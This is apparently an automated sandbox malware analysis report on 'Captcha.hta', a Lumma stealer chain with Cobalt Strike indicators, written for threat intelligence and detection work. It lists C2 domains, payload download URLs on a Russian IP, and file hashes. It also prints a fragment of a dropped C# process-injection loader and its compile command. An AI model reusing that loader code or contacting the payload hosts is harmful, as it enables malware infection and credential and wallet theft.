              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1578704 Sample: Captcha.hta Startdate: 20/12/2024 Architecture: WINDOWS Score: 100 40 discokeyus.lat 2->40 42 grannyejh.lat 2->42 56 Suricata IDS alerts for network traffic 2->56 58 Found malware configuration 2->58 60 Malicious sample detected (through community Yara rule) 2->60 62 14 other signatures 2->62 10 mshta.exe 1 2->10         started        signatures3 process4 signatures5 64 Suspicious command line found 10->64 13 cmd.exe 1 10->13         started        process6 signatures7 74 Detected Cobalt Strike Beacon 13->74 76 Bypasses PowerShell execution policy 13->76 16 powershell.exe 15 23 13->16         started        20 curl.exe 1 13->20         started        23 conhost.exe 13->23         started        process8 dnsIp9 34 C:\Users\user\AppData\...\0bqs2aon.cmdline, Unicode 16->34 dropped 36 C:\Users\user\AppData\Local\...\0bqs2aon.0.cs, Unicode 16->36 dropped 48 Found many strings related to Crypto-Wallets (likely being stolen) 16->48 50 Writes to foreign memory regions 16->50 52 Suspicious execution chain found 16->52 54 3 other signatures 16->54 25 RegAsm.exe 16->25         started        29 csc.exe 3 16->29         started        44 147.45.44.131, 49730, 49733, 80 FREE-NET-ASFREEnetEU Russian Federation 20->44 file10 signatures11 process12 dnsIp13 46 discokeyus.lat 172.67.197.170, 443, 49736, 49738 CLOUDFLARENETUS United States 25->46 66 Query firmware table information (likely to detect VMs) 25->66 68 Found many strings related to Crypto-Wallets (likely being stolen) 25->68 70 Tries to harvest and steal ftp login credentials 25->70 72 2 other signatures 25->72 38 C:\Users\user\AppData\Local\...\0bqs2aon.dll, PE32 29->38 dropped 32 cvtres.exe 1 29->32         started        file14 signatures15 process16

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              Captcha.hta20%VirustotalBrowse
              Captcha.hta21%ReversingLabsDocument-HTML.Trojan.Lummastealer
              SourceDetectionScannerLabelLink
              C:\Users\user\AppData\Local\Temp\0bqs2aon\0bqs2aon.dll100%AviraHEUR/AGEN.1300034
              C:\Users\user\AppData\Local\Temp\0bqs2aon\0bqs2aon.dll100%Joe Sandbox ML
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
              NameIPActiveMaliciousAntivirus DetectionReputation
              discokeyus.lat
              172.67.197.170
              truetrue
                unknown
                grannyejh.lat
                unknown
                unknownfalse
                  high
                  NameMaliciousAntivirus DetectionReputation
                  http://147.45.44.131/infopage/knhy.exetrue
                    unknown
                    necklacebudi.latfalse
                      high
                      https://discokeyus.lat/apitrue
                        unknown
                        aspecteirs.latfalse
                          high
                          energyaffai.latfalse
                            high
                            http://147.45.44.131/infopage/bhgto.ps1true
                              unknown
                              sustainskelet.latfalse
                                high
                                crosshuaht.latfalse
                                  high
                                  rapeflowwj.latfalse
                                    high
                                    grannyejh.latfalse
                                      high
                                      discokeyus.latfalse
                                        high
                                        NameSourceMaliciousAntivirus DetectionReputation
                                        http://nuget.org/NuGet.exepowershell.exe, 00000005.00000002.1739806714.0000000005F2B000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000005.00000002.1737453939.0000000005013000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            http://147.45.44.131/infopage/bnkh.exepowershell.exe, 00000005.00000002.1737453939.00000000051B6000.00000004.00000800.00020000.00000000.sdmpfalse
                                              unknown
                                              https://discokeyus.lat/SRegAsm.exe, 00000008.00000002.1937475217.0000000001116000.00000004.00000020.00020000.00000000.sdmpfalse
                                                unknown
                                                http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000005.00000002.1737453939.0000000005013000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  https://go.micropowershell.exe, 00000005.00000002.1737453939.000000000530C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    http://147.45.44.131/infopage/bhgto.ps1#fcurl.exe, 00000004.00000002.1695164199.0000000003488000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      unknown
                                                      https://contoso.com/Licensepowershell.exe, 00000005.00000002.1739806714.0000000005F2B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        https://contoso.com/Iconpowershell.exe, 00000005.00000002.1739806714.0000000005F2B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          https://github.com/Pester/Pesterpowershell.exe, 00000005.00000002.1737453939.0000000005013000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            http://147.45.44.131powershell.exe, 00000005.00000002.1737453939.0000000005013000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1737453939.00000000051B6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1737453939.0000000005196000.00000004.00000800.00020000.00000000.sdmptrue
                                                              unknown
                                                              http://crl.microRegAsm.exe, 00000008.00000002.1937052782.00000000010B6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                high
                                                                https://aka.ms/pscore6lBpowershell.exe, 00000005.00000002.1737453939.0000000004EC1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpgRegAsm.exe, 00000008.00000002.1937957812.000000000375C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://contoso.com/powershell.exe, 00000005.00000002.1739806714.0000000005F2B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://discokeyus.lat/RegAsm.exe, 00000008.00000002.1937475217.0000000001116000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        unknown
                                                                        https://nuget.org/nuget.exepowershell.exe, 00000005.00000002.1739806714.0000000005F2B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          http://147.45.44.131/infopage/bhgto.ps1?gcurl.exe, 00000004.00000002.1695164199.0000000003488000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            unknown
                                                                            http://147.45.44.131/infopage/bhgto.ps1MgHcurl.exe, 00000004.00000002.1695164199.0000000003488000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              unknown
                                                                              https://imp.mt48.net/static?id=RegAsm.exe, 00000008.00000002.1937957812.000000000375C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://discokeyus.lat:443/apiRegAsm.exe, 00000008.00000002.1937475217.0000000001116000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  unknown
                                                                                  https://discokeyus.lat/apiPRegAsm.exe, 00000008.00000002.1937052782.000000000108B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    unknown
                                                                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000005.00000002.1737453939.0000000004EC1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://discokeyus.lat/BRegAsm.exe, 00000008.00000002.1937475217.0000000001116000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        unknown
                                                                                        https://discokeyus.lat:443/apiuserRegAsm.exe, 00000008.00000002.1937052782.00000000010A0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          unknown
                                                                                          http://147.45.44.131/infopage/bhgto.ps1Qfcurl.exe, 00000004.00000002.1695164199.0000000003488000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            unknown
                                                                                            • No. of IPs < 25%
                                                                                            • 25% < No. of IPs < 50%
                                                                                            • 50% < No. of IPs < 75%
                                                                                            • 75% < No. of IPs
                                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                                            147.45.44.131
                                                                                            unknownRussian Federation
                                                                                            2895FREE-NET-ASFREEnetEUtrue
                                                                                            172.67.197.170
                                                                                            discokeyus.latUnited States
                                                                                            13335CLOUDFLARENETUStrue
                                                                                            Joe Sandbox version:41.0.0 Charoite
                                                                                            Analysis ID:1578704
                                                                                            Start date and time:2024-12-20 07:17:05 +01:00
                                                                                            Joe Sandbox product:CloudBasic
                                                                                            Overall analysis duration:0h 6m 1s
                                                                                            Hypervisor based Inspection enabled:false
                                                                                            Report type:full
                                                                                            Cookbook file name:default.jbs
                                                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                            Number of analysed new started processes analysed:13
                                                                                            Number of new started drivers analysed:0
                                                                                            Number of existing processes analysed:0
                                                                                            Number of existing drivers analysed:0
                                                                                            Number of injected processes analysed:0
                                                                                            Technologies:
                                                                                            • HCA enabled
                                                                                            • EGA enabled
                                                                                            • AMSI enabled
                                                                                            Analysis Mode:default
                                                                                            Analysis stop reason:Timeout
                                                                                            Sample name:Captcha.hta
                                                                                            Detection:MAL
                                                                                            Classification:mal100.phis.troj.spyw.expl.evad.winHTA@14/10@2/2
                                                                                            EGA Information:
                                                                                            • Successful, ratio: 66.7%
                                                                                            HCA Information:
                                                                                            • Successful, ratio: 92%
                                                                                            • Number of executed functions: 41
                                                                                            • Number of non-executed functions: 104
                                                                                            Cookbook Comments:
                                                                                            • Found application associated with file extension: .hta
                                                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                            • Excluded IPs from analysis (whitelisted): 23.218.208.109, 20.109.210.53, 13.107.246.63
                                                                                            • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                            • Execution Graph export aborted for target mshta.exe, PID 1516 because there are no executed function
                                                                                            • Not all processes where analyzed, report is missing behavior information
                                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                            • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                            TimeTypeDescription
                                                                                            01:17:59API Interceptor33x Sleep call for process: powershell.exe modified
                                                                                            01:18:03API Interceptor9x Sleep call for process: RegAsm.exe modified
                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                            147.45.44.131htZgRRla8S.exeGet hashmaliciousLummaC StealerBrowse
                                                                                            • 147.45.44.131/infopage/ung0.exe
                                                                                            Captcha.htaGet hashmaliciousLummaC, Cobalt Strike, HTMLPhisher, LummaC StealerBrowse
                                                                                            • 147.45.44.131/infopage/ilk.exe
                                                                                            Captcha.htaGet hashmaliciousHTMLPhisherBrowse
                                                                                            • 147.45.44.131/infopage/bgfi.ps1
                                                                                            Captcha.htaGet hashmaliciousCobalt Strike, HTMLPhisher, LummaC StealerBrowse
                                                                                            • 147.45.44.131/infopage/ung0.exe
                                                                                            EBUdultKh7.exeGet hashmaliciousLummaC StealerBrowse
                                                                                            • 147.45.44.131/infopage/vsom.exe
                                                                                            MiJZ3z4t5K.exeGet hashmaliciousUnknownBrowse
                                                                                            • 147.45.44.131/infopage/Tom.exe
                                                                                            ZjH6H6xqo7.exeGet hashmaliciousLummaCBrowse
                                                                                            • 147.45.44.131/infopage/tvh53.exe
                                                                                            nlJ2sNaZVi.exeGet hashmaliciousLummaCBrowse
                                                                                            • 147.45.44.131/infopage/tbh75.exe
                                                                                            TZ33WZy6QL.exeGet hashmaliciousLummaCBrowse
                                                                                            • 147.45.44.131/infopage/tbg9.exe
                                                                                            7IXl1M9JGV.exeGet hashmaliciousLummaCBrowse
                                                                                            • 147.45.44.131/infopage/tbg9.exe
                                                                                            172.67.197.170iOnDpwrkWY.exeGet hashmaliciousLummaCBrowse
                                                                                              hzD92yQcTT.exeGet hashmaliciousLummaCBrowse
                                                                                                V-Mail_maryland.gov.htmlGet hashmaliciousHTMLPhisher, Tycoon2FABrowse
                                                                                                  https://simanis.sman5semarang.sch.id/kro/Get hashmaliciousUnknownBrowse
                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                    discokeyus.latk6A01XaeEn.exeGet hashmaliciousLummaCBrowse
                                                                                                    • 104.21.21.99
                                                                                                    iOnDpwrkWY.exeGet hashmaliciousLummaCBrowse
                                                                                                    • 172.67.197.170
                                                                                                    hzD92yQcTT.exeGet hashmaliciousLummaCBrowse
                                                                                                    • 172.67.197.170
                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                    CLOUDFLARENETUSfile.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC StealerBrowse
                                                                                                    • 172.67.180.113
                                                                                                    8ZVMneG.exeGet hashmaliciousLummaCBrowse
                                                                                                    • 104.21.66.86
                                                                                                    https://us-east-2.protection.sophos.com/?d=purogosouls.github.io&u=aHR0cHM6Ly9wdXJvZ29zb3Vscy5naXRodWIuaW8vNjRkczZmNHM5ZDRmODlzZDRzZjQ2c2Q0ZjYv&i=NWQ0M2E1N2M3M2U5MzQxMGM1NjBhNmQ1&t=dEtlN04wQWZmZ0hqZlpiZEYwVXZ4NHFvc2NQNGtsUWl4Unlndk5helZOaz0=&h=356f16f6a39049efa5b305c7477e094a&s=AVNPUEhUT0NFTkNSWVBUSVZaHP6eDnex344kFPbGkNGwPXEfGJHtcvdIV0gRc1_JzA%20us-east-2.protection.sophos.comGet hashmaliciousHTMLPhisherBrowse
                                                                                                    • 104.21.49.70
                                                                                                    Laurier Partners Proposal.emlGet hashmaliciousHTMLPhisherBrowse
                                                                                                    • 1.1.1.1
                                                                                                    Dec 2024_12192924_Image.pdfGet hashmaliciousHTMLPhisherBrowse
                                                                                                    • 104.21.49.70
                                                                                                    http://senalongley.comGet hashmaliciousUnknownBrowse
                                                                                                    • 104.21.96.47
                                                                                                    https://f.io/nWWUxvn6Get hashmaliciousHTMLPhisherBrowse
                                                                                                    • 1.1.1.1
                                                                                                    c9toH15OT0.exeGet hashmaliciousUnknownBrowse
                                                                                                    • 104.26.12.205
                                                                                                    file.exeGet hashmaliciousLummaC, Amadey, LummaC StealerBrowse
                                                                                                    • 104.21.23.76
                                                                                                    Executed_Innocap-#81(Final.pdfGet hashmaliciousUnknownBrowse
                                                                                                    • 104.21.11.54
                                                                                                    FREE-NET-ASFREEnetEUfile.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC StealerBrowse
                                                                                                    • 147.45.113.159
                                                                                                    file.exeGet hashmaliciousLummaC, Amadey, LummaC StealerBrowse
                                                                                                    • 147.45.113.159
                                                                                                    file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC StealerBrowse
                                                                                                    • 147.45.113.159
                                                                                                    https://gateway.lighthouse.storage/ipfs/bafkreigjxudfsi54f5pliswxztgujxgpdhe4uyrezdbg5avbtrclxrxc6iGet hashmaliciousHTMLPhisherBrowse
                                                                                                    • 147.45.179.98
                                                                                                    file.exeGet hashmaliciousNetSupport RAT, LummaC, Amadey, LummaC StealerBrowse
                                                                                                    • 147.45.113.159
                                                                                                    file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, XmrigBrowse
                                                                                                    • 147.45.113.159
                                                                                                    iviewers.dllGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                                    • 147.45.47.15
                                                                                                    script.ps1Get hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                                    • 147.45.47.15
                                                                                                    script.htaGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                                    • 147.45.47.15
                                                                                                    R4qP4YM0QX.lnkGet hashmaliciousUnknownBrowse
                                                                                                    • 147.45.49.155
                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                    a0e9f5d64349fb13191bc781f81f42e1file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC StealerBrowse
                                                                                                    • 172.67.197.170
                                                                                                    8ZVMneG.exeGet hashmaliciousLummaCBrowse
                                                                                                    • 172.67.197.170
                                                                                                    file.exeGet hashmaliciousLummaC, Amadey, LummaC StealerBrowse
                                                                                                    • 172.67.197.170
                                                                                                    file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC StealerBrowse
                                                                                                    • 172.67.197.170
                                                                                                    hubus.exeGet hashmaliciousLummaC, PureLog Stealer, zgRATBrowse
                                                                                                    • 172.67.197.170
                                                                                                    file.exeGet hashmaliciousNetSupport RAT, LummaC, Amadey, LummaC StealerBrowse
                                                                                                    • 172.67.197.170
                                                                                                    file.exeGet hashmaliciousScreenConnect Tool, LummaC, Amadey, Cryptbot, LummaC Stealer, VidarBrowse
                                                                                                    • 172.67.197.170
                                                                                                    mirabon.msiGet hashmaliciousBruteRatel, LatrodectusBrowse
                                                                                                    • 172.67.197.170
                                                                                                    Tii6ue74NB.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, RHADAMANTHYS, Stealc, VidarBrowse
                                                                                                    • 172.67.197.170
                                                                                                    file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, RHADAMANTHYSBrowse
                                                                                                    • 172.67.197.170
                                                                                                    No context
                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):64
                                                                                                    Entropy (8bit):0.34726597513537405
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Nlll:Nll
                                                                                                    MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                                    SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                                    SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                                    SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                                    Malicious:false
                                                                                                    Reputation:high, very likely benign file
                                                                                                    Preview:@...e...........................................................
                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):10583
                                                                                                    Entropy (8bit):4.487855797297623
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:eC2oTLpQgzLOoBwMw2kdl/kSpu/TuvnMHzrEx:tDLOoBol/kSpgCvMfM
                                                                                                    MD5:B022C6FE4494666C8337A975D175C726
                                                                                                    SHA1:8197D4A993E7547D19D7B067B4D28EBE48329793
                                                                                                    SHA-256:D02016A307B3E8DA1A80C29551D44C17358910816E992BC1B53DA006D62DD56A
                                                                                                    SHA-512:DF670235E87B1EE957086BE88731B458C28629E65E052276DD543BE273030986A7E5C67FA83587F68EC06FA0F33B0C3F1F041C2D06073709B340F96C3884F2B9
                                                                                                    Malicious:true
                                                                                                    Preview:.using System;..using System.Diagnostics;..using System.Runtime.InteropServices;....public class Engineers..{.. #region ConversionMethods.. public static Int16 ConvertToInt16(byte[] value, int startIndex).. {.. return BitConverter.ToInt16(value, startIndex);.. }.... public static Int32 ConvertToInt32(byte[] value, int startIndex).. {.. return BitConverter.ToInt32(value, startIndex);.. }.... public static byte[] ConvertToBytes(int value).. {.. return BitConverter.GetBytes(value);.. }.. #endregion.... #region ApiNames.. public static string[] GetApiNames().. {.. return new string[].. {.. "kernel32",.. "ntdll",.. "ResumeThread",.. "Wow64SetThreadContext",.. "SetThreadContext",.. "Wow64GetThreadContext",.. "GetThreadContext",.. "VirtualAllocEx",.. "WriteProcessMemory",.. "ReadProcessMemory",..
                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):204
                                                                                                    Entropy (8bit):5.0183418458769795
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:pAu+H2L/6K2wkn23fFjvFJJUzxszIwkn23fFjvf:p37L/6KRfNjv6QfNjvf
                                                                                                    MD5:3774DC42CF9E9485E05C92C1879B1840
                                                                                                    SHA1:73B04E09E578F19CEB8866AD02736AF5D2E90185
                                                                                                    SHA-256:7CD3B5991A27E58B948C9F6A048785C27CEB52DDA4EE1F4EEC6720D28B87D687
                                                                                                    SHA-512:4CA903DBEA2EDD021920FCE4FC80AEC3D5B9D4D85B70351F78EC43CC2F3963DB563E7946EE429DDA9152AB99DAAA8E96C3286558525034C9BEDD7E0577FDDEA8
                                                                                                    Malicious:true
                                                                                                    Preview:./t:library /utf8output /R:"System.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\0bqs2aon\0bqs2aon.dll" /debug- /optimize+ "C:\Users\user\AppData\Local\Temp\0bqs2aon\0bqs2aon.0.cs"
                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):8704
                                                                                                    Entropy (8bit):4.660631941487504
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:/0CaQHf9WDa/u65Rj2cajUxd5MqmeNcV:/3WDl895e05MqJyV
                                                                                                    MD5:5F1DD7B556601C708CD708E2ABE8F9BD
                                                                                                    SHA1:95D4C5FDAF10769E94004C6B30C9ECE35628B463
                                                                                                    SHA-256:DFF7A2D1B2D8704D76AA627B7ADC13970EF768D47671A532360D3590E4F38D60
                                                                                                    SHA-512:E2EA610C65C6E2B8F4CC908E24EF5B467AFD0BFD7E47F46C81810EE46234498D12C0B3805D1414366C3E2400177F5189FA6A5A51ADBBA17A9513BED46A428F38
                                                                                                    Malicious:true
                                                                                                    Antivirus:
                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....&eg...........!.................9... ...@....... ....................................@..................................9..K....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`....... ..............@..B.................9......H.......d%.............................................................."..(....*"..(....*..(....*...0..m.................r...p...r...p...r...p...r9..p...re..p...r...p...r...p...r...p...r...p....r...p....r=..p....rg..p..*...(......(.........(....(.........*....0..&....... .......+E......YE....................YE............+....+....,....+...+.....X...2...8..............................(....(....}....~.....r...p~....~..... ....~.........o0.......-.s....z..<(..........4X(......
                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Unicode text, UTF-8 (with BOM) text, with CRLF, CR line terminators
                                                                                                    Category:modified
                                                                                                    Size (bytes):702
                                                                                                    Entropy (8bit):5.245112529951363
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:KJN/qR37L/6KRfNjv6QfNjvGKaxK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:KJBqdn6KRfh1fhGKax5DqBVKVrdFAMBt
                                                                                                    MD5:F84659E8CD1E1033C0C955790A633AEA
                                                                                                    SHA1:0DFA59EF02B42228C80D1C35FAE12A7E29F563B4
                                                                                                    SHA-256:4C4CE7A3D013FFB982C955B10FB1500A12667A35DE2C55F81A7C8BDF52AAC9BC
                                                                                                    SHA-512:A10F5D2B296364878292EFDAFAF23B0CC4F9455C8BD7BD285C302534C52A3308C933BEC244EECACC1925603165FC197954A4A98538035A28551377770590356D
                                                                                                    Malicious:false
                                                                                                    Preview:.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\0bqs2aon\0bqs2aon.dll" /debug- /optimize+ "C:\Users\user\AppData\Local\Temp\0bqs2aon\0bqs2aon.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                    File Type:MSVC .res
                                                                                                    Category:dropped
                                                                                                    Size (bytes):652
                                                                                                    Entropy (8bit):3.084178750454184
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gry4ak7Ynqq+PN5Dlq5J:+RI+ycuZhN2akS+PNnqX
                                                                                                    MD5:27234BE8D2CE3231EAAC1D9EAC1DC0DD
                                                                                                    SHA1:3B480C5C86E5AE3BBF183B68D8E45EBB2898BB2C
                                                                                                    SHA-256:2A12630A4D562CEC3AFBF09063AE71BDE3C11269AD3AC7D402E99BC1CE373E70
                                                                                                    SHA-512:0AEADF4872FACC49C3729CB021CEF026BBD053AD81D37210DA3E45F98F21FBC87AC0BB1F456CE10EB2E8B30AC4E1C27C03C614867C6C0B6C06C0ED8E571D2CA3
                                                                                                    Malicious:false
                                                                                                    Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...0.b.q.s.2.a.o.n...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...0.b.q.s.2.a.o.n...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                                    File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Fri Dec 20 08:08:49 2024, 1st section name ".debug$S"
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1328
                                                                                                    Entropy (8bit):3.9634112364046885
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:HFe9EuZfxBXDfHxwKEbsmfII+ycuZhN2akS+PNnqSqd:MBfz6KPmg1ul2a3iqSK
                                                                                                    MD5:0F9E12A5B5C9C04FCC0C4C0D5072C90A
                                                                                                    SHA1:11F2DDDC93FF8FD170F37F59BCF7EBA74483D6ED
                                                                                                    SHA-256:C340BFE0689EA612E7BAB941E614B008E024E6112B5C1B7F5E6C5BAA82FA0CF6
                                                                                                    SHA-512:932FD66A661D4B1D0EACD515DCEB551DC295C5CFE6433ADB40C1F5276CEC6D9589BC7E2D24246D4C40A95BAD4909561D0CA874B30A85095B53A5C77A7FA96074
                                                                                                    Malicious:false
                                                                                                    Preview:L....&eg.............debug$S........L...................@..B.rsrc$01........X.......0...........@..@.rsrc$02........P...:...............@..@........S....c:\Users\user\AppData\Local\Temp\0bqs2aon\CSCCC253661431F432090E0BD8713DD5F5.TMP................'#K...21.................4.......C:\Users\user\AppData\Local\Temp\RES1090.tmp.-.<....................a..Microsoft (R) CVTRES.\.=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe...............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...0.b.q.s.2.a.o.n...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.
                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
